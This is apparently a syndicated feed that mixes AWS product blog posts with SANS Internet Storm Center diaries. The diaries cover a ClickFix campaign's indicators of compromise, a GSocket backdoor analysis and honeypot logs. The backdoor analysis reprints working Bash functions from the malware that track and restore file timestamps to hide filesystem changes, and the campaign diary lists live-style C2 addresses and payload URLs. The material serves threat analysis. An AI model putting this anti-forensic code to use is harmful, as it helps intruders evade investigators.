This is the first update to the TeamPCP supply chain campaign threat intelligence report, “When the Security Scanner Became the Weapon” (v3.0, March 25, 2026). That report covers the full campaign from the February 28 initial access through the March 24 LiteLLM PyPI compromise. This update covers developments since publication.
Apple Patches (almost) everything again. March 2026 edition., (Wed, Mar 25th)
Apple released the next version of its operating system, patching 85 different vulnerabilities across all of them. None of the vulnerabilities are currently being exploited. The last three macOS "generations" are covered, as are the last two versions of iOS/iPadOS. For tvOS, watchOS, and visionOS, only the current version received patches. This update also includes the recently released Background Security Improvements. Some older watchOS versions received updates, but these updates do not address any security issues.
Announcing Amazon Aurora PostgreSQL serverless database creation in seconds
At re:Invent 2025, Colin Lazier, vice president of databases at AWS, emphasized the importance of building at the speed of an idea—enabling rapid progress from concept to running application. Customers can already create production-ready Amazon DynamoDB tables and Amazon Aurora DSQL databases in seconds. He previewed creating an Amazon Aurora serverless database with the same speed, and customers have since requested quick access and speed to this capability.

Today, we’re announcing the general availability of a new express configuration for Amazon Aurora PostgreSQL, a streamlined database creation experience with preconfigured defaults designed to help you get started in seconds.
With only two clicks, you can have an Aurora PostgreSQL serverless database ready to use in seconds. You have the flexibility to modify certain settings during and after database creation in the new configuration. For example, you can change the capacity range for the serverless instance at the time of create or add read replicas, modify parameter groups after the database is created. Aurora clusters with express configuration are created without an Amazon Virtual Private Cloud (Amazon VPC) network and include an internet access gateway for secure connections from your favorite development tools – no VPN, or AWS Direct Connect required. Express configuration also sets up AWS Identity and Access Management (IAM) authentication for your administrator user by default, enabling passwordless database authentication from the beginning without additional configuration.
After it’s created, you have access to features available for Aurora PostgreSQL serverless, such as deploying additional read replicas for high availability and automated failover capabilities. This launch also introduces a new internet access gateway routing layer for Aurora. Your new serverless instance comes enabled by default with this feature, which allows your applications to connect securely from anywhere in the world through the internet using the PostgreSQL wire protocol from a wide range of developer tools. This gateway is distributed across multiple Availability Zones, offering the same level of high availability as your Aurora cluster.
Creating and connecting to Aurora in seconds means fundamentally rethinking how you get started. We launched multiple capabilities that work together to help you onboard and run your application with Aurora. Aurora is now available on AWS Free Tier, which you gain hands-on experience with Aurora at no upfront cost. After it’s created, you can directly query an Aurora database in AWS CloudShell or using programming languages and developer tools through a new internet accessible routing component for Aurora. With integrations such as v0 by Vercel, you can use natural language to start building your application with the features and benefits of Aurora.
Create an Aurora PostgreSQL serverless database in seconds
To get started, go to the Aurora and RDS console and in the navigation pane, choose Dashboard. Then, choose Create with a rocket icon.

Review pre-configured settings in the Create with express configuration dialog box. You can modify the DB cluster identifier or the capacity range as needed. Choose Create database.

You can also use the AWS Command Line Interface (AWS CLI) or AWS SDKs with the parameter --express-configuration to create both a cluster and an instance within the cluster with a single API call which makes it ready for running queries in seconds.To learn more, visit Creating an Aurora PostgreSQL DB cluster with express configuration.
Here is a CLI command to create the cluster:
$ aws rds create-db-cluster --db-cluster-identifier channy-express-db
--engine aurora-postgresql
–with-express-configuration
Your Aurora PostgreSQL serverless database should be ready in seconds. A success banner confirms the creation, and the database status changes to Available.

After your database is ready, go to the Connectivity & security tab to access three connection options. When connecting through SDKs, APIs, or third-party tools including agents, choose Code snippets. You can choose various programming languages such as .NET, Golang, JDBC, Node.js, PHP, PSQL, Python, and TypeScript. You can paste the code from each step into your tool and run the commands.
For example, the following Python code is dynamically generated to reflect the authentication configuration:
import psycopg2
import boto3
auth_token = boto3.client('rds', region_name='ap-south-1').generate_db_auth_token(DBHostname='channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com', Port=5432, DBUsername='postgres', Region='ap-south-1')
conn = None
try:
conn = psycopg2.connect(
host='channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
port=5432,
database='postgres',
user='postgres',
password=auth_token,
sslmode='require'
)
cur = conn.cursor()
cur.execute('SELECT version();')
print(cur.fetchone()[0])
cur.close()
except Exception as e:
print(f"Database error: {e}")
raise
finally:
if conn:
conn.close()
const { Client } = require('pg');
const AWS = require('aws-sdk');
AWS.config.update({ region: 'ap-south-1' });
async function main() {
let password = '';
const signer = new AWS.RDS.Signer({ region: 'ap-south-1', hostname: 'channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com', port: 5432, username: 'postgres' });
password = signer.getAuthToken({});
const client = new Client({
host: 'channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
port: 5432,
database: 'postgres',
user: 'postgres',
password,
ssl: { rejectUnauthorized: false }
});
try {
await client.connect();
const res = await client.query('SELECT version()');
console.log(res.rows[0].version);
} catch (error) {
console.error('Database error:', error);
throw error;
} finally {
await client.end();
}
}
main().catch(console.error);
Choose CloudShell for quick access to the AWS CLI which launches directly from the console. When you choose Launch CloudShell, you can see the command is pre-populated with relevant information to connect to your specific cluster. After connecting to the shell, you should see the psql login and the postgres => prompt to run SQL commands.

You can also choose Endpoints to use tools that only support username and password credentials, such as pgAdmin. When you choose Get token, you use an AWS Identity and Access Management (IAM) authentication token generated by the utility in the password field. The token is generated for the master username that you set up at the time of creating the database. The token is valid for 15 minutes at a time. If the tool you’re using terminates the connection, you will need to generate the token again.
Building your application faster with Aurora databases
At re:Invent 2025, we announced enhancements to the AWS Free Tier program, offering up to $200 in AWS credits that can be used across AWS services. You’ll receive $100 in AWS credits upon sign-up and can earn an additional $100 in credits by using services such as Amazon Relational Database Service (Amazon RDS), AWS Lambda, and Amazon Bedrock. In addition, Amazon Aurora is now available across a broad set of eligible Free Tier database services.

Developers are embracing platforms such as Vercel, where natural language is all it takes to build production-ready applications. We announced integrations with Vercel Marketplace to create and connect to an AWS database directly from Vercel in seconds and v0 by Vercel, an AI-powered tool that transforms your ideas into production-ready, full-stack web applications in minutes. It includes Aurora PostgreSQL, Aurora DSQL, and DynamoDB databases. You can also connect your existing databases created through express configuration with Vercel. To learn more, visit AWS for Vercel.

Like Vercel, we’re bringing our databases seamlessly into their experiences and are integrating directly with widely adopted frameworks, AI assistant coding tools, environments, and developer tools, all to unlock your ability to build at the speed of an idea.
We introduced Aurora PostgreSQL integration with Kiro powers, which developers can use to build Aurora PostgreSQL backed applications faster with AI agent-assisted development through Kiro. You can use Kiro power for Aurora PostgreSQL within Kiro IDE and from the Kiro powers webpage for one-click installation. To learn more about this Kiro Power, read Introducing Amazon Aurora powers for Kiro and Amazon Aurora Postgres MCP Server.

Now available
You can create an Aurora PostgreSQL serverless database in seconds today in all AWS commercial Regions. For Regional availability and a future roadmap, visit the AWS Capabilities by Region.
You pay only for capacity consumed based on Aurora Capacity Units (ACUs) billed per second from zero capacity, which automatically starts up, shuts down, and scales capacity up or down based on your application’s needs. To learn more, visit the Amazon Aurora Pricing page.
Give it a try in the Aurora and RDS console and send feedback to AWS re:Post for Aurora PostgreSQL or through your usual AWS Support contacts.
— Channy
SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT (ArechClient2), (Wed, Mar 25th)
Introduction
This diary provides indicators from the SmartApeSG (ZPHP, HANEYMANEY) campaign I saw on Tuesday, 2026-03-24. SmartApeSG is one of many campaigns that use the ClickFix technique. This past week, I've seen NetSupport RAT as follow-up malware from Remcos RAT pushed by this campaign. But this time, I also saw indicators for StealC malware and Sectop RAT (ArecheClient2) after NetSupport RAT appeared on my infected lab host.
Not all of the follow-up malware appears shortly after the initial Remcos RAT malware. Here's the timeline for malware from my SmartApeSG activity on Tuesday 2026-03-24:
- 17:11 UTC – Ran ClickFix script from SmartApeSG fake CAPTCHA page
- 17:12 UTC – Remcos RAT post-infection traffic starts
- 17:16 UTC – NetSupport RAT post-infection traffic starts
- 18:18 UTC – StealC post-infection traffic starts
- 19:36 UTC – Sectop RAT post-infection traffic starts
While the NetSupport RAT activity happened approximately 4 minutes after the Remcos RAT activity, the StealC traffic didn't happen until approximately 1 hour after the NetSupport RAT activity started. And the traffic for Sectop RAT happened approximately 1 hour and 18 minutes after the StealC activity started.
Images from the infection

Shown above: Page from a legitimate but compromised website with injected script for the fake CAPTCHA page.

Shown above: Fake CAPTCHA page with ClickFix instructions. This image shows the malicious script injected into a user's clipboard.

Shown above: Traffic from the infection filtered in Wireshark.
Indicators of Compromise
Associated domains and IP addresses:
- fresicrto[.]top – Domain for server hosting fake CAPTCHA page
- urotypos[.]com – Called by ClickFix instructions, this domain is for a server hosting the initial malware
- 95.142.45[.]231:443 – Remcos RAT C2 server
- 185.163.47[.]220:443 – NetSupport RAT C2 server
- 89.46.38[.]100:80 – StealC C2 server
- 195.85.115[.]11:9000 – Sectop RAT (ArechClient2) C2 server
Example of HTA file retrieved by ClickFix script:
- SHA256 hash: 212d8007a7ce374d38949cf54d80133bd69338131670282008940f1995d7a720
- File size: 47,714 bytes
- File type: HTML document text, ASCII text, with very long lines (6272)
- Retrieved from: hxxps[:]//urotypos[.]com/cd/temp
- Saved location: C:Users[username]AppDataLocalpost.hta
- Note: ClickFix script deletes the file after retrieving and running it
Example of ZIP archive for Remcos RAT retrieved by the above HTA file:
- SHA256 hash: a6a748c0606fb9600fdf04763523b7da20b382b054b875fdd1ef1c36fc16079a
- File size: 85,328,653 bytes
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- Retrieved from: hxxps://urotypos[.]com/ls/production
- Saved location: C:Users[username]AppDataLocal361118191361118191.pdf
ZIP archive containing NetSupport RAT package:
- SHA256 hash: 6e26ff49387088178319e116700b123d27216d98ba3ae1ce492544cb9acd38f0
- File size: 9,171,647 bytes
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- File name: UpdateInstaller.zip
- Note: I created this zip archive from the extracted files under C:ProgramDataUpdateInstaller
RAR archive for StealC package:
- SHA256 hash: a7b9be1211c6de76bab31dbcd3a1c99861cf18e3230ea9f634e07d22c179d1ca
- File size: 6,178,471 bytes
- File type: RAR archive data, v5
- Saved location: C:UsersPublicMusicfinalmesh.zip
RAR archive for Sectop RAT (ArechClient2) package:
- SHA256 hash: c90435370728d48cba1c00d92cc3bf99e85f01aa52ecd6c6df2e8137db964796
- File size: 6,908,049 bytes
- File type: RAR archive data, v5
- Saved location: C:ProgramDatadrag2pdf.zip
Final words
The archive files for Remcos RAT, StealC and Sectop RAT are packages that use legitimate EXE files to side-load malicious DLLs (a technique called DLL side-loading). The NetSupport RAT package is a legitimate tool that's configured to use an attacker-controlled server.
As always, the files, URLs and domains for SmartApeSG activity change on a near-daily basis. And names of the HTA file and ZIP archive for Remcos RAT are different for each infection. The indicators described in this article may no longer be current as you read this. However, this activity confirms that the SmartApeSG campaign can push a variety of malware after an initial infection.
—
Bradley Duncan
brad [at] malware-traffic-analysis.net
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Detecting IP KVMs, (Tue, Mar 24th)
I have written about how to use IP KVMs securely, and recently, researchers at Eclypsium published yet another report on IP KVM vulnerabilities. But there is another issue I haven't mentioned yet with IP KVMs: rogue IP KVMs. IP KVMs are often used by criminals. For example, North Koreans used KVMs to connect remotely to laptops sent to them by their employers. The laptops were located in the US, and the North Korean workers used IP KVMs to remotely connect to them. IP KVMs could also be used to access office PCs, either to enable undetected "work from home" or by threat actors who use them to gain remote access after installing the device on site.
Tool updates: lots of security and logic fixes, (Mon, Mar 23rd)
So, I've been slow to get on the Claude Code/OpenCode/Codex/OpenClaw bandwagon, but I had some time last week so I asked Claude to review (/security-review) some of my python scripts. He found more than I'd like to admit, so I checked in a bunch of updates. In reviewing his suggestions, he was right, I made some stupid mistakes, some of which have been sitting in there for a long time. It was nothing earth-shattering and it took almost no time for Claude, it took longer for me to read through the updates he wanted to make, figure out what he was seeing, and decide whether to accept them or tweak them. Here are a few of them.
AWS Weekly Roundup: NVIDIA Nemotron 3 Super on Amazon Bedrock, Nova Forge SDK, Amazon Corretto 26, and more (March 23, 2026)
Hello! I’m Daniel Abib, and this is my first AWS Weekly Roundup. I’m a Senior Specialist Solutions Architect at AWS, focused on the generative AI and Amazon Bedrock. With over 28 years of experience in solution architecture, software development, and cloud architecture, I help Startups & Enterprises harness the power of generative AI with Amazon Bedrock. I’ve been at AWS for more than six and a half years, working closely with customers across Latin America, and I’m also passionate about Serverless technologies.

Outside of work and endurance sports, I’m a dedicated father to Cecília (7) and Rafael (4), who keep me busier—and happier— than any distributed system ever could. I’m based in São Paulo, you can find me on LinkedIn and X (@DCABib), where I share insights about generative AI, Amazon Bedrock, AWS serverless services, and the occasional Ironman throwback.
Now, let’s get into this week’s AWS news…
Last week’s launches
Here are some launches and updates from this past week that caught my attention:
- Amazon Redshift increases performance for new queries in dashboards and ETL workloads by up to 7x — Amazon Redshift now delivers up to 7x faster performance for new queries in dashboards and ETL workloads. Queries you run for the first time — without cached results — now execute significantly faster, reducing wait times for interactive dashboards and accelerating your ETL pipelines. This is particularly impactful for workloads with high query variability where cache hits are less frequent.
- NVIDIA Nemotron 3 Super now available on Amazon Bedrock — NVIDIA Nemotron 3 Super is now available in Amazon Bedrock, expanding the lineup of foundation models you can access through the unified Bedrock API. Nemotron 3 Super is a high-performance language model optimized for tasks such as text generation, complex reasoning, summarization, and code generation. You can now invoke Nemotron 3 Super alongside other foundation models in your existing Bedrock workflows, without managing any infrastructure.
- Introducing Nova Forge SDK, a seamless way to customize Nova models for enterprise AI — Nova Forge SDK provides a streamlined way to fine-tune and customize Amazon Nova models for enterprise use cases. You can adapt Nova models to your domain-specific data and deploy them directly within Amazon Bedrock, reducing the complexity of building tailored AI solutions. The SDK handles the heavy lifting of model customization, letting you focus on your business logic rather than the underlying infrastructure.
- Amazon Corretto 26 is now generally available — Amazon Corretto 26, the latest long-term support (LTS) release of the no-cost, production-ready distribution of OpenJDK, is now generally available. Corretto 26 includes the latest Java language features, performance improvements, and security patches, all backed by long-term support from AWS. You can use it across development and production environments on Amazon Linux, Windows, macOS, and Docker images.
- AWS Lambda now supports Availability Zone metadata — AWS Lambda now provides Availability Zone metadata for your function invocations. You can now identify which Availability Zone your Lambda function is running in, enabling better observability, more informed architectural decisions, and simplified troubleshooting for latency-sensitive and multi-AZ workloads. This is particularly useful when correlating Lambda execution with other AZ-aware services in your architecture.
- Amazon CloudWatch Logs now supports log ingestion using HTTP-based protocol — Amazon CloudWatch Logs now supports ingesting logs using an HTTP-based protocol, making it simpler to send logs from applications and services that use standard HTTP endpoints. You can now route logs to CloudWatch Logs without requiring custom agents or additional SDK integrations, lowering the barrier to centralized log management across your workloads.
- Amazon EKS announces 99.99% Service Level Agreement and new 8XL scaling tier for Provisioned Control Plane clusters — Amazon EKS now offers a 99.99% Service Level Agreement (SLA) for clusters running on Provisioned Control Plane, up from the 99.95% SLA offered on standard control plane. EKS is also introducing the 8XL scaling tier, the largest available Provisioned Control Plane tier, which doubles the Kubernetes API server request processing capacity of the next lower 4XL tier — ideal for large-scale workloads like AI/ML training, high-performance computing (HPC), and large-scale data processing.
Other AWS news
Here are some additional posts and resources that you might find interesting:
- Kiro for students — Kiro is now available for students, giving the next generation of builders access to AI-powered development tools at no cost. As Swami Sivasubramanian shared on LinkedIn, “Students are the future decision-makers shaping technology” — and Kiro gives them hands-on experience building with AI from day one. If you’re a student or know someone who is, this is a great opportunity to start building with AI-assisted development.
- Strands Steering Hooks achieved 100% agent accuracy — The Strands Agents team published results showing that Steering Hooks can achieve 100% agent accuracy, outperforming both prompt engineering and rigid workflow approaches for controlling agent behavior. As Swami highlighted on LinkedIn, building reliable AI agents often means rethinking how we guide model behavior — and Steering Hooks offer a compelling new path to agent reliability.
- Introducing Badges on AWS Builder Center — AWS Builder Center now features badges that recognize your contributions and achievements within the builder community. You can earn badges by sharing solutions, participating in challenges, and engaging with fellow builders. It’s a great way to showcase your expertise and track your growth.
- Keep Building Together: The Power of Community — A thoughtful read on the power of community-driven learning and collaboration in the AWS ecosystem. Whether you’re just getting started with AWS or you’ve been building for years, the builder community is a place to connect, share knowledge, and grow together. I highly recommend checking it out.
Upcoming AWS events
Check your calendar and sign up for upcoming AWS events:
- AWS Summits — Join AWS Summits in 2026, free in-person events where you can explore emerging cloud and AI technologies, learn best practices, and network with industry peers and experts. Upcoming Summits include Paris (April 1), London (April 22), Bengaluru (April 23–24), Singapore (May 6), Tel Aviv (May 6), and Stockholm (May 7).
- AWS Community Days — Community-led conferences where content is planned, sourced, and delivered by community leaders, featuring technical discussions, workshops, and hands-on labs. Upcoming events include San Francisco (April 10) and Romania (April 23–24).
- AWSome Women Summit LATAM — Taking place on March 28 in Mexico City, this event celebrates and empowers women in cloud technology across Latin America. A fantastic initiative for the LATAM tech community.
Join the AWS Builder Center to connect with builders, share solutions, and access content that supports your development. Browse the AWS Events and Webinars for upcoming AWS-led in-person and virtual events and developer-focused events.
That’s all for this week. Check back next Monday for another Weekly Roundup!
This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!
GSocket Backdoor Delivered Through Bash Script, (Fri, Mar 20th)
Yesterday, I discovered a malicious Bash script that installs a GSocket backdoor on the victim’s computer. I don’t know the source of the script not how it is delivered to the victim.
GSocket[1] is a networking tool, but also a relay infrastructure, that enables direct, peer-to-peer–style communication between systems using a shared secret instead of IP addresses or open ports. It works by having both sides connect outbound to a global relay network. Tools like gs-netcat can provide remote shells, file transfer, or tunneling and bypass classic security controls. The script that I found uses a copy of gs-netcat but the way it implements persistence and anti-forensic techniques deserves a review.
A few weeks ago, I found a sample that used GSocket connectivity as a C2 channel. It makes me curious and I started to hunt for more samples. Bingo! The new one that I found (SHA256:6ce69f0a0db6c5e1479d2b05fb361846957f5ad8170f5e43c7d66928a43f3286[2]) has been detected by only 17 antivirus solutions on VT. The script is not obfuscated and even has comments so I think that it was uploaded on VT for "testing" purposes by the developper (just a guess)
Let’s have a look at the techniques used. When you execute it in a sandbox, you see this:

Note the identification of the tool ("G-Socket Bypass Stealth") and the reference to "@bboscat"[3]
A GSocket client is downloaded, started and is talking to the following IP:

The malware implements persistence through different well-known techniques on Linux. First, a cron job is created:

Every top-hour, the disguised gs-netcat will be killed (if running) and restarted. To improve persistence, the same code is added to the victim's .profile:

The malware itself is copied in .ssh/putty and the GSocket shared secret stored in a fake SSH key file:

The ELF file id_rsa (SHA256: d94f75a70b5cabaf786ac57177ed841732e62bdcc9a29e06e5b41d9be567bcfa) is the gs-netcat tool downloaded directly from the G-Socket CDN.
Ok, let’s have a look at an interesting anti-forensic technique implemented in the Bash script. File operations are not simply performed using classic commands like cp, rm, mv, etc. They are embedded in “helper” functions with a timestamp tracking/restoration system so the malware can later hide filesystem changes. Here is an example with a function that will create a file:
mk_file()
{
local fn
local oldest
local pdir
local pdir_added
fn="$1"
local exists
# DEBUGF "${CC}MK_FILE($fn)${CN}"
pdir="$(dirname "$fn")"
[[ -e "$fn" ]] && exists=1
ts_is_marked "$pdir" || {
# HERE: Parent not tracked
_ts_add "$pdir" "<NOT BY XMKDIR>"
pdir_added=1
}
ts_is_marked "$fn" || {
# HERE: Not yet tracked
_ts_get_ts "$fn"
# Do not add creation fails.
touch "$fn" 2>/dev/null || {
# HERE: Permission denied
[[ -n "$pdir_added" ]] && {
# Remove pdir if it was added above
# Bash <5.0 does not support arr[-1]
# Quote (") to silence shellcheck
unset "_ts_ts_a[${#_ts_ts_a[@]}-1]"
unset "_ts_fn_a[${#_ts_fn_a[@]}-1]"
unset "_ts_mkdir_fn_a[${#_ts_mkdir_fn_a[@]}-1]"
}
return 69 # False
}
[[ -z $exists ]] && chmod 600 "$fn"
_ts_ts_a+=("$_ts_ts")
_ts_fn_a+=("$fn");
_ts_mkdir_fn_a+=("<NOT BY XMKDIR>")
return
}
touch "$fn" 2>/dev/null || return
[[ -z $exists ]] && chmod 600 "$fn"
true
}
Here are also two interesting function:
# Restore timestamp of files
ts_restore()
{
local fn
local n
local ts
[[ ${#_ts_fn_a[@]} -ne ${#_ts_ts_a[@]} ]] && { echo >&2 "Ooops"; return; }
n=0
while :; do
[[ $n -eq "${#_ts_fn_a[@]}" ]] && break
ts="${_ts_ts_a[$n]}"
fn="${_ts_fn_a[$n]}"
# DEBUGF "RESTORE-TS ${fn} ${ts}"
((n++))
_ts_fix "$fn" "$ts"
done
unset _ts_fn_a
unset _ts_ts_a
n=0
while :; do
[[ $n -eq "${#_ts_systemd_ts_a[@]}" ]] && break
ts="${_ts_systemd_ts_a[$n]}"
fn="${_ts_systemd_fn_a[$n]}"
# DEBUGF "RESTORE-LAST-TS ${fn} ${ts}"
((n++))
_ts_fix "$fn" "$ts" "symlink"
done
unset _ts_systemd_fn_a
unset _ts_systemd_ts_a
}
ts_is_marked()
{
local fn
local a
fn="$1"
for a in "${_ts_fn_a[@]}"; do
[[ "$a" = "$fn" ]] && return 0 # True
done
return 1 # False
}
ts_is_marked() checks whether a file/directory is already registered for timestamp restoration, preventing duplicate tracking and ensuring the script’s anti-forensic timestamp manipulation works correctly. I asked ChatGPT to generate a graph that explains this technique:

Finally, because it’s fully based on Bash, the script will infect all UNIX flavors, MacOS included:
[[ -z "$OSTYPE" ]] && {
local osname
osname="$(uname -s)"
if [[ "$osname" == *FreeBSD* ]]; then
OSTYPE="FreeBSD"
elif [[ "$osname" == *Darwin* ]]; then
OSTYPE="darwin22.0"
elif [[ "$osname" == *OpenBSD* ]]; then
OSTYPE="openbsd7.3"
elif [[ "$osname" == *Linux* ]]; then
OSTYPE="linux-gnu"
fi
}
[1] https://www.gsocket.io
[2] https://www.virustotal.com/gui/file/6ce69f0a0db6c5e1479d2b05fb361846957f5ad8170f5e43c7d66928a43f3286/telemetry
[3] https://zone-xsec.com/archive/attacker/%40bboscat
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
20 years in the AWS Cloud – how time flies!
AWS has reached its 20th anniversary! With a steady pace of innovation, AWS has grown to offer over 240 comprehensive cloud services and continues to launch thousands of new features annually for millions of customers. During this time, over 4,700 posts have been published on this blog—more than double the number since Jeff Barr wrote the 10th anniversary post.
AWS changed my life
Reflecting on what I was doing 20 years ago, I met Jeff in Seoul on March 13, 2006, when he came as the keynote speaker for the Korea NGWeb conference. At that time, Amazon was one of the first pioneers to initiate an API economy, introducing ecommerce API services. After the keynote speech, he returned home that evening, and I believe he wrote the Amazon S3 launch blog post on the flight back to the United States.

That short meeting with him brought significant changes to my life. He became my role model as a blogger, and I began building API-based services in my company and opening them to third-party developers. When I was a PhD student while taking a break from work, I realized that for individual researchers like me, AWS Cloud services are powerful tools for conducting large-scale research projects. After returning to work, my company became one of the first AWS customers in Korea in 2014. Countless developers—myself included—have embraced cloud computing and actively used its capabilities to accomplish what was previously impossible.
Over the past decade, the technology landscape has transformed dramatically. Deep learning emerged as a breakthrough in AI, evolving through generative AI based on large language models (LLMs) to today’s agentic AI technology. Jeff wrote, “When looking into the future, you need to be able to distinguish between flashy distractions and genuine trends, while remaining flexible enough to pivot if yesterday’s niche becomes today’s mainstream technology.” This principle guides how AWS approaches innovation—we start by listening to what customers truly need. The real trend isn’t pursuing every emerging technology, but rather reimagining solutions that address customers’ most critical challenges.
20 years of AWS
For the first 10 years, Jeff selected his favorite AWS launches and blog posts. Amazon S3, Amazon EC2 (2006), Amazon Relational Database Service, Amazon Virtual Private Cloud (2009), Amazon DynamoDB, Amazon Redshift (2012), Amazon WorkSpaces, Amazon Kinesis (2013), AWS Lambda (2014), and AWS IoT (2015).

While I also hate to play favorites, I want to choose some of my favorite AWS blog posts of the past decade.
- Deploying containers easily (2014) – Amazon Elastic Container Service makes it straightforward for you to run any number of containers across a managed cluster of Amazon EC2 instances using powerful APIs and other tools. In 2017, we launched Amazon Elastic Kubernetes Service as a fully managed Kubernetes service and AWS Fargate as a serverless deployment option.
- High availability database at global scale (2017) – Amazon Aurora is a modern relational database service offering performance and high availability at scale. In 2018, we launched Amazon Aurora Serverless v1, and this serverless database evolved to Amazon Aurora Serverless v2 to scale down to zero. In 2025, we also launched Amazon Aurora DSQL is the fastest serverless distributed SQL database for always available applications.
- Machine learning (ML) at your fingertips (2017) – Amazon SageMaker is a fully managed end-to-end ML service that data scientists, developers, and ML experts can use to quickly build, train, and host machine learning models at scale. In 2024, we launched the next generation of Amazon SageMaker, a unified platform for data, analytics, and AI and introduced Amazon SageMaker AI to focus specifically on building, training, and deploying AI and ML models at scale.
- Best price performance for cloud workloads (2018) – We launched Amazon EC2 A1 instances powered by the first generation of Arm-based AWS Graviton Processors designed to deliver the best price performance for your cloud workloads. Last year, we previewed EC2 M9g instances powered by AWS Graviton5 processors. Over 90,000 AWS customers have reaped the benefits of Graviton supporting popular AWS services such as Amazon ECS and Amazon EKS, AWS Lambda, Amazon RDS, Amazon ElastiCache, Amazon EMR, and Amazon OpenSearch Service.
- Run AWS Cloud in your data center (2019) – AWS Outposts is a family of fully managed services delivering AWS infrastructure and services to virtually any on-premises or edge location for a truly consistent hybrid experience. Now, AWS Outposts is available in a variety of form factors, from 1U and 2U Outposts servers to 42U Outposts racks, and multiple rack deployments. Customers such as DISH, Fanduel, Morningstar, Philips, and others use Outposts in workloads requiring low latency access to on-premises systems, local data processing, data residency, and application migration with local system interdependencies.
- Best price performance for ML workloads (2019) – We launched Amazon EC2 Inf1 instances powered by the first generation of AWS Inferentia chips designed to provide fast, low-latency inferencing. In 2022, we launched Amazon EC2 Trn1 instances powered by the first generation of AWS Trainium chips optimized for high performance AI training. Last year, we launched Amazon EC2 Trn3 UltraServers powered by Trainium3 to deliver the best token economics for next-generation generative AI applications. Customers such as Anthropic, Decart, poolside, Databricks, Ricoh, Karakuri, SplashMusic, and others are realizing performance and cost benefits of Trainium-based instances and UltraServers.
- Build your generative AI apps on AWS (2023) – Amazon Bedrock is a fully managed service that offers a choice of industry leading AI models along with a broad set of capabilities that you need to build generative AI applications, simplifying development with security, privacy, and responsible AI. Last year, we introduced Amazon Bedrock AgentCore, an agentic platform for building, deploying, and operating effective agents securely at scale. Now, more than 100,000 customers worldwide choose Amazon Bedrock to deliver personalized experiences, automate complex workflows, and uncover actionable insights.
- Your AI coding companion (2023) – We launched Amazon CodeWhisperer as the industry’s first cloud-based AI coding assistant service. The service delivered code generation from comments, open-source code reference tracking, and vulnerability scanning capabilities. In 2024, we rebranded the service to Amazon Q Developer and expanded its features to include a chat-based assistant in the console, project-based code generation, and code transformation tools. In 2025, this service evolved into Kiro, a new agentic AI development tool that brings structure to AI coding through spec-driven development, taking projects from prototype to production. Recently, Kiro previewed an autonomous agent, a frontier agent that works independently on development tasks, maintaining context and learning from every interaction.
- Broaden your AI model choices (2024) – We launched Amazon Titan models further increasing cost-effective AI model choice for text and multimodal needs in Amazon Bedrock. At AWS re:Invent 2024, we announced Amazon Nova models that delivers frontier intelligence and industry leading price performance. Now Amazon Nova has a portfolio of AI offerings—including Amazon Nova models, Amazon Nova Forge, a new service to build your own frontier models; and Amazon Nova Act, a new service to build agents that automate browser-based UI workflows powered by a custom Amazon Nova 2 Lite model.
Build with AI: Your path forward
A decade ago, AWS responded to the emergence of deep learning by launching the broadest and deepest ML services, such as Amazon SageMaker, democratizing AI for a wide range of customers—from individual developers and startups to large enterprises—regardless of their technical expertise.
AI technology has advanced significantly, but building and deploying AI models and applications still remains complex for many developers and organizations. AWS offers the broadest selection of AI models through Amazon Bedrock, including leading providers such as Anthropic and OpenAI. By using our model training and inference infrastructure and responsible AI both practical and scalable, you can accelerate trusted AI innovation while maintaining control of your data and costs—all built on our global infrastructure’s operational excellence.
Reinvent your idea, keep on learning, build confidently with AI you can trust, and share your successes with us! New AWS customers receive up to $200 in credits to try AWS AI for free. If you’re a student, start building with Kiro for free using 1,000 credits per month for one year.
— Channy
Interesting Message Stored in Cowrie Logs, (Wed, Mar 18th)
This activity was found and reported by BACS student Adam Thorman as part of one of his assignments which I posted his final paper [1] last week. This activity appeared to only have occurred on the 19 Feb 2026 where at least 2 sensors detected on the same day by DShield sensor in the cowrie logs an echo command that included: "MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here". My DShield sensor captured activity from source IP 64.89.161.198 between 30 Jan – 22 Feb 2026 that included portscans, a successful login via Telnet (TCP/23) and web access that included all the activity listed below captured by the DShield sensor (cowrie, webhoneypot & iptables logs).